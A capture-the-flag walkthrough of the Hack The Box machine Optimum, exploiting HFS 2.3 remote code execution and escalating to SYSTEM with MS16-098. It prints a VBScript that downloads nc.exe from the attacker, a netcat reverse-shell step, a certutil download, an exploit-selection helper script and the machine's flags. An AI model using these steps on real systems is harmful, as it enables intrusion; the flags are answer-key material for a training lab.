[hackthebox] Optimum

This is a relatively easy machine; as the difficulty matrix shows, the attacks are mostly CVE-based, i.e. public exploits for known software versions rather than custom work.

nmap enumeration

nmap -A -p- -T4 -oN optimum -vvv <target IP>

Http File Server 2.3

As the browser shows, the web service is HttpFileServer (HFS), a Windows program for serving files over HTTP; it is easy to set up and use without much effort on the user's end.


httpfileserver 2.3 exploit

A web search reveals that HFS 2.3.x has a public remote code execution exploit written in Python (Exploit-DB 39161, the script used below; the underlying bug is CVE-2014-6287).

Reading the exploit code, it is clear that the Python script builds a VBScript with the following source (URL-encoded inside the script; ip_addr is the attacker's IP address that the script substitutes in):

dim xHttp: Set xHttp = createobject("Microsoft.XMLHTTP")
dim bStrm: Set bStrm = createobject("Adodb.Stream")
xHttp.Open "GET", "http://"+ip_addr+"/nc.exe", False
xHttp.Send '// actually issue the request (present in the exploit, needed for responseBody to be populated)

with bStrm
    .type = 1 '//binary
    .open '// the stream must be opened before it can be written
    .write xHttp.responseBody
    .savetofile "C:\Users\Public\nc.exe", 2 '//overwrite
end with

The VBScript downloads nc.exe from the attacker's machine and saves it as C:\Users\Public\nc.exe. The exploit then runs the script with cscript.exe, and finally runs nc.exe -e cmd.exe back to the attacker, which gives a reverse cmd shell. The vulnerability in HFS 2.3 lies in its search parameter: a null byte (%00) at the start of the value breaks the routine that is supposed to neutralise macro markers in user input, so anything that follows it between {. and .} is executed as an HFS macro. The exploit uses the save macro to write the script to disk and the exec macro to run it.

Get the user flag

I need to start a web server that hosts nc.exe, and in a second terminal a netcat listener for the shell to connect back to.
In the exploit code I change ip_addr to my own tun0 (VPN) address and local_port to the listener port, so that the payload connects back to my listener.
Step 1:
python3 -m http.server 80
This command has to be executed in the directory that contains nc.exe (a Windows build of netcat; the VBScript fetches it from http://<ip_addr>/nc.exe).

Step 2:
Start the listener: sudo nc -lvnp 443

Step 3:
Modify the IP address (and port, if not 443) in the exploit code, then run it. The script is Python 2 (it uses urllib2) and takes the target IP and the HFS port as arguments:

python 39161.py <target IP> 80

The user flag is d0c39409d7b994a9a1389ebf38ef5f73

Get the root flag

I recommend taking a look at https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Windows%20-%20Privilege%20Escalation.md

systeminfo shows the machine is running Windows Server 2012 R2 Standard, build 9600 (x64). Several kernel exploits apply; I chose the kernel driver exploit MS16-098 (win32k.sys). Although it is published against Windows 8.1, it works on Server 2012 R2 as well, because both are build 9600 and share the same kernel.
I download the precompiled bfill.exe that is published with the exploit and serve it from my web server so Optimum can fetch it.


On the Optimum machine I fetch it with certutil (both the source URL and the output path are required):
certutil -urlcache -split -f http://<attacker IP>/bfill.exe c:\users\kostas\downloads\bfill.exe

Then run bfill.exe from the shell; it spawns a cmd.exe running as NT AUTHORITY\SYSTEM (confirm with whoami). Kernel exploits can crash the box, so keep the HFS exploit and listener ready to re-run in case Optimum reboots.
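As an added example (my code, not from the page and not from PayloadsAllTheThings), the decision made above, "build 9600, so the Windows 8.1 exploit applies to Server 2012 R2 too, unless the fix is installed", written as a small check over systeminfo output. The systeminfo sample is constructed with the hotfix list cut down; KB3177725 is, to my knowledge, the MS16-098 update for Windows 8.1 / Server 2012 R2, but verify it against the bulletin before relying on it.

```python
"""Parse systeminfo output and decide whether a kernel exploit is worth trying."""
import re

# Constructed sample shaped like real `systeminfo` output (hotfix list shortened).
SAMPLE_SYSTEMINFO = """\
Host Name:                 OPTIMUM
OS Name:                   Microsoft Windows Server 2012 R2 Standard
OS Version:                6.3.9600 N/A Build 9600
OS Manufacturer:           Microsoft Corporation
System Type:               x64-based PC
Hotfix(s):                 3 Hotfix(s) Installed.
                           [01]: KB2959936
                           [02]: KB2896496
                           [03]: KB3000850
"""

HOTFIX_RE = re.compile(r"\[\d+\]:\s*(KB\d+)")


def parse_systeminfo(text):
    """Return a dict of 'Key: value' fields plus 'hotfixes', 'build' and 'x64'."""
    info = {"hotfixes": []}
    for line in text.splitlines():
        match = HOTFIX_RE.search(line)
        if match:
            # Continuation lines of the Hotfix(s) section are indented "[nn]: KBxxxxxx".
            info["hotfixes"].append(match.group(1))
            continue
        if line and not line[0].isspace() and ":" in line:
            key, value = line.split(":", 1)  # values may themselves contain ':'
            info[key.strip()] = value.strip()
    build = re.search(r"Build (\d+)", info.get("OS Version", ""))
    info["build"] = int(build.group(1)) if build else None
    info["x64"] = info.get("System Type", "").startswith("x64")
    return info


# Kernel exploits considered, keyed by bulletin. Build 9600 covers both
# Windows 8.1 and Server 2012 R2, which is why the 8.1 exploit applies here.
# The published bfill.exe is an x64 build. The KB is the patch that closes the
# bug (assumed to be KB3177725 for MS16-098; check the bulletin).
CANDIDATES = {
    "MS16-098": {"builds": {9600}, "kb": "KB3177725", "needs_x64": True},
}


def applicable_exploits(info, candidates=CANDIDATES):
    """Names of candidate exploits whose build matches and whose fix is absent."""
    applicable = []
    for name, cand in candidates.items():
        if info["build"] not in cand["builds"]:
            continue
        if cand["needs_x64"] and not info["x64"]:
            continue
        if cand["kb"] in info["hotfixes"]:
            continue  # already patched: running the exploit would only risk a crash
        applicable.append(name)
    return applicable


if __name__ == "__main__":
    parsed = parse_systeminfo(SAMPLE_SYSTEMINFO)
    print("build", parsed["build"], "x64", parsed["x64"], "hotfixes", len(parsed["hotfixes"]))
    print("candidates:", applicable_exploits(parsed))
```

Feed it the real output (systeminfo > si.txt on the target, then parse the file) and extend CANDIDATES with the other bulletins from the privilege-escalation reference above; the point of the hotfix check is to avoid firing a kernel exploit at a patched box, since a failed attempt there usually means a blue screen rather than a clean error.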


the root flag is 51ed1b36553c8461f4552c2e92b3eeed


